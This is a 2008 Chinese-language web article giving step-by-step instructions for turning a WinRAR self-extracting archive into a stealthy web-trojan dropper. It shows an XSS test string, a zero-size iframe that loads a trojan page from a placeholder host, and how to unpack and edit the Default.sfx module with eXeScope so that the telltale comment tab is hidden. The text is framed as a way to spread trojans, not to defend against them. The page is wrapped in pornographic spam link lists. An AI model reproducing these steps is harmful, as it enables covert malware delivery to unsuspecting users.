国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

WinRAR與木馬結合的新安全隱患解析
2008-05-04   

壓縮文件是最見的文件類型之一,無論是正常的軟件程序,或者是“精心”制作的壓縮包木馬,都隨處可見。對于這類最常見的文件,我們當然會想方設法,讓它為我們傳播木馬服務。不過,普通的壓縮包中夾帶木馬的方法已經有些落伍了,今天我們將重點分析一種WinRAR壓縮包傳播木馬的新思路!

    一、WinRAR與木馬結合的優點

    大家都知道WinRAR軟件可以制作EXE自解壓文件,以方便沒有安裝WinRAR軟件的用戶。WinRAR制作的自解壓文件非常常見,而且不少軟件也開始采用它來制作安裝程序。用WinRAR制作自解壓文件時,還可以對自解壓界面進行自定義美化,在自解壓時顯示任意的文件或圖片。我們可以通過對WinRAR自解壓文件界面的再定義,從而欺騙對方在解壓前執行網頁木馬。

    二、簡單測試

    首先,我們需要制作一個WinRAR自解壓文件。可以將任意資源,比如幾張圖片或音樂之類的打包壓縮成RAR格式。然后用WinRAR打開壓縮包,點擊WinRAR工具欄上的“自解壓”按鈕,打開自解壓文件制作對話框。在“自解壓模塊”中選擇“Deault.sfx”模塊,點擊“高級自解壓選項”按鈕,打開高級自解壓選項設置對話框。選擇“文本和圖標”選項卡,在下面的“自解壓文件窗口中顯示的文本”區里,可以輸人任意文字,都將顯示在自解壓界面中。如果我們輸入網頁代碼,是否會執行呢?

    這里我們先來測試一下,在文本輸入區中,輸入如下代碼:

    <script>alert('nethack')</script>

    這段代碼常常被用來檢測跨站漏洞,如果存在漏洞的話,那么在網頁中會彈出一個文字提示對話框。點擊“確定”按鈕,返回自解壓對話框,再點擊“確定”按鈕,即可在壓縮包文件路徑下,生成一個同名的后綴為.exe的自解壓文件。現在,我們來雙擊這個自解壓文件,看看前面的跨站檢測代碼是否執行?自解壓文件打開后,同時彈出了剛才設置的文字提示對話框,說明網頁代碼執行了。

    由此可見,WinRAR的自解壓文件界面存在著跨站掛馬的漏洞,我們完全可以修改剛才的測試代碼,讓自解壓文件在打開時顯示任意的網頁,當然也可以顯示木馬網頁,從而實現利用WinRAR自解壓文件掛網頁木馬的攻擊目的!

三、自解壓掛網頁木馬

    現在,我們來制作一個具有掛馬攻擊性的WinRAR自解壓文件。首先,準備一個網頁木馬,并將其上傳到某個網站空間中去。這里假設網頁木馬鏈接地址為“http://www.XXX.com/01.htm”。然后制作一個自解壓文件,方法與前面相同,但是在寫入文本框中,我們需要輸入如下代碼:

    <iframe width=0 height=0 src="http://www.XXX.com/01.htm"></iframe>


WinRAR與木馬結合的新安全隱患解析

    這段代碼表示顯示一個長寬都為0網頁象素,也就是不可見的頁面框架,顯示的網頁內容為指定的木馬網頁。確定后即可制作成功一個掛馬攻擊的WinRAR自解壓文件了。但是這里為了便于抓圖顯示攻擊效果,我們將掛馬語句改為了:

    <iframe width=800 height=800 src="http://www.baidu.com"></iframe>

    表示顯示一個長寬為300的頁面框架,顯示的網頁內容為百度首頁。雙擊打開我們加入了掛馬代碼的WinRAR自解壓文件時,可以在自解壓界面窗口中看到顯示了百度網頁。由此可見掛成功!只要將代碼換為真實的掛馬代碼,那么在WinRAR自解壓界面中,就會顯示空白頁面,同時隱藏的打開木馬網頁,根本察覺不到任何攻擊的癥狀!

四、掛馬自解壓包的不足

    雖然用上面的方法制作出來的WinRAR自解壓木馬,在攻擊時可以沒有任何癥狀,但是還是有缺陷的。首先,使用代碼隱藏掛馬,雖然不會顯示木馬網頁,但是界面中變成空白頁面,不會顯示默認的提示信息。另外,所有制作的帶有腳本的自解壓文件,在其“屬性”中都會多出“注釋”選項卡,即使是不帶攻擊性的自解壓文件也是如此。我們用右鍵點擊剛才制作的自解壓文件,在彈出菜單中選擇“屬性”命令,打開屬性對話框。選擇“注釋”選項頁,如此一來,就會暴露在創建自解壓格式壓縮文件時設置的掛馬代碼了。

    五、木馬保護更強悍

    那么,如何才能讓隱藏注釋信息,讓掛馬攻擊的自解壓包文件更完美呢?其實,自解壓文件的“注釋”信息,來源于WinRAR中的“Deault.sfx”自解壓模塊。我們完全可以修改此模塊,讓自解壓文件不顯示“注釋”信息。

    在WinRAR安裝目錄下,可以找到模塊文件“Deault.sfx”。在修改前,可用Peid查殼,發現文件加了UPX殼,用UPX Shell對其脫殼即可。  

    下載安裝“eXeScope資源修改器”,用eXeScope打開“Deault.sfx”文件。在eXeScope左邊的列表中,展開“資源”→“字符串表”→“l0”→“中文(中國)”,在右邊列表出現的150到155的字符串為默認自解壓文件的自解壓文件窗口中顯示的文本代碼,每行字串長度不能超過250個英文字符。我們可進行修改,以達到隱藏掛馬的目的,在155行代碼的最后添加如下掛馬代碼:

    <iframe width=800 height=800 src="http://www.baidu.com"></iframe>


WinRAR與木馬結合的新安全隱患解析

    修改完畢后,關閉eXeScope,保存更新“Deault.sfx”文件。然后直接創建一個WinRAR自解壓文件,無需在其中添加掛馬代碼了,此時創建和自解壓文件中自動顯示了掛馬網頁(如圖11)。但是在文件屬性中,卻根本看不到“注釋”選項頁,這樣就實現了隱藏“注釋”信息。如果我們掛馬框架長寬為0的話,在自解壓界面中顯示的是“單擊安裝按鈕開始解壓……”之類的默認信息,也不會出現前面的空白頁。

    這樣,一個極度完美的WinRAR自解壓木馬便制作成功了!你能找出它與普通自解壓文件有什么不同嗎?

熱詞搜索:

上一篇:解決網內終端無法通信故障(2)
下一篇:網絡安全對癥下藥 給自己設道安全防線

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
中文字幕亚洲电影| 日本亚洲电影天堂| 国产精品天美传媒沈樵| 26uuu精品一区二区| 亚洲精品在线免费观看视频| 日韩精品一区二区三区老鸭窝| 欧美日韩电影一区| 欧美日韩激情在线| 欧美电影在哪看比较好| 69堂成人精品免费视频| 这里是久久伊人| 欧美成人女星排行榜| 26uuu色噜噜精品一区二区| 精品国产乱码久久久久久夜甘婷婷| 欧美草草影院在线视频| 2017欧美狠狠色| 国产精品丝袜久久久久久app| 亚洲欧洲无码一区二区三区| 亚洲美女区一区| 亚洲18影院在线观看| 免播放器亚洲一区| 国产成人综合网站| www.成人在线| 欧美日韩国产中文| 日韩欧美一区二区视频| 国产亚洲精品bt天堂精选| 国产精品毛片大码女人| 亚洲欧美另类图片小说| 午夜精品久久一牛影视| 久久国产欧美日韩精品| 国产一区日韩二区欧美三区| 成人va在线观看| 一本色道久久综合亚洲精品按摩| 欧美色视频一区| 日韩女优毛片在线| 日本一区二区三区在线不卡| 亚洲精品中文字幕乱码三区 | 久久精品国产澳门| 国产不卡在线视频| 欧美做爰猛烈大尺度电影无法无天| 欧美日韩久久一区二区| 久久综合九色综合97婷婷| 日韩伦理av电影| 日韩 欧美一区二区三区| 国产麻豆成人精品| 色综合天天在线| 日韩视频在线一区二区| 久久久久久99久久久精品网站| 亚洲图片欧美激情| 日本午夜一区二区| 成人国产一区二区三区精品| 欧美二区在线观看| 国产精品看片你懂得| 日韩不卡手机在线v区| 成人精品一区二区三区中文字幕| 欧美日韩国产不卡| 国产精品福利一区二区| 国产成人在线视频免费播放| 成人18精品视频| 日韩欧美三级在线| 亚洲乱码日产精品bd| 国内久久精品视频| 欧美写真视频网站| 欧美国产一区视频在线观看| 青青草伊人久久| 91精品福利在线| 国产亚洲一区二区三区在线观看| 视频一区中文字幕国产| 99热国产精品| 精品99久久久久久| 午夜精品久久久久久久久久久| 懂色av一区二区三区蜜臀| 欧美日韩精品一区二区三区蜜桃| 国产精品福利av| 国产一区 二区 三区一级| 欧美日韩的一区二区| 亚洲精品欧美专区| 国产69精品久久777的优势| 欧美一级精品大片| 一区二区三区日韩精品视频| 床上的激情91.| 欧美v亚洲v综合ⅴ国产v| 亚洲成国产人片在线观看| 成人福利视频网站| 欧美精品一区二区在线播放| 免费成人在线网站| 欧美乱熟臀69xxxxxx| 一区二区三区精品视频在线| voyeur盗摄精品| 国产三级精品在线| 狠狠色丁香婷综合久久| 日韩欧美第一区| 日本不卡1234视频| 欧美久久婷婷综合色| 亚洲一区在线观看网站| 色哟哟在线观看一区二区三区| 国产精品美女www爽爽爽| 东方欧美亚洲色图在线| 国产欧美一区二区三区在线看蜜臀| 九色综合国产一区二区三区| 日韩你懂的电影在线观看| 日韩精品乱码免费| 777xxx欧美| 男女激情视频一区| 欧美一区二区人人喊爽| 三级成人在线视频| 91精品国产欧美一区二区18| 日韩不卡手机在线v区| 欧美一区二区美女| 日本欧美在线看| 精品日韩欧美一区二区| 激情综合五月婷婷| 国产亚洲精品aa午夜观看| 成人一级黄色片| 亚洲少妇中出一区| 色婷婷精品久久二区二区蜜臀av| 亚洲黄网站在线观看| 欧美性生交片4| 三级久久三级久久| 精品国产凹凸成av人网站| 国产一二三精品| 国产精品久久久久永久免费观看| 91麻豆精东视频| 亚洲国产精品久久久男人的天堂| 久久久久久久久久久久久久久99| 国产精品一区在线观看乱码| 国产精品视频九色porn| 色综合天天性综合| 亚洲成人精品一区二区| 日韩欧美一区二区三区在线| 国产福利一区在线| 亚洲欧美一区二区久久| 欧美日韩亚洲综合一区二区三区| 免费观看91视频大全| 久久久久亚洲蜜桃| 色婷婷综合久久久| 日韩精品五月天| 久久久精品免费观看| 99在线精品观看| 午夜视频久久久久久| 久久麻豆一区二区| 色综合天天综合网天天狠天天| 香蕉av福利精品导航| 久久久久久久免费视频了| 色视频成人在线观看免| 青草国产精品久久久久久| 国产精品日韩精品欧美在线| 欧美在线看片a免费观看| 精品综合久久久久久8888| 国产精品对白交换视频| 91精品婷婷国产综合久久 | 日韩欧美国产麻豆| 成人app网站| 日韩激情av在线| 中文一区在线播放| 在线不卡的av| 91在线porny国产在线看| 丝袜亚洲另类欧美综合| 国产精品欧美久久久久无广告| 欧美人与性动xxxx| 成人性视频网站| 日本怡春院一区二区| 亚洲视频一区二区在线| 欧美大片顶级少妇| 在线观看国产精品网站| 国产风韵犹存在线视精品| 天堂在线亚洲视频| 国产精品久久久久影院色老大| 91精品国产综合久久精品| 91在线观看污| 国产在线精品一区二区不卡了| 亚洲一区二区在线免费看| 国产拍欧美日韩视频二区| 91精品免费在线观看| 日本韩国一区二区三区视频| 国产一区二区视频在线播放| 肉丝袜脚交视频一区二区| 综合久久给合久久狠狠狠97色| 精品国产麻豆免费人成网站| 欧美男生操女生| 色综合久久综合网欧美综合网| 国产超碰在线一区| 国产最新精品精品你懂的| 天堂一区二区在线免费观看| 一区二区三区四区激情| 国产精品丝袜在线| 国产午夜精品一区二区 | 男女男精品视频网| 亚洲国产wwwccc36天堂| 中文字幕字幕中文在线中不卡视频| 欧美不卡在线视频| 欧美一区二区视频观看视频| 欧美日韩亚洲综合一区| 91在线看国产| av中文字幕在线不卡| 成人福利电影精品一区二区在线观看| 国产精品亚洲综合一区在线观看| 狠狠色丁香婷婷综合久久片| 精品一区二区三区在线播放| 久久99九九99精品|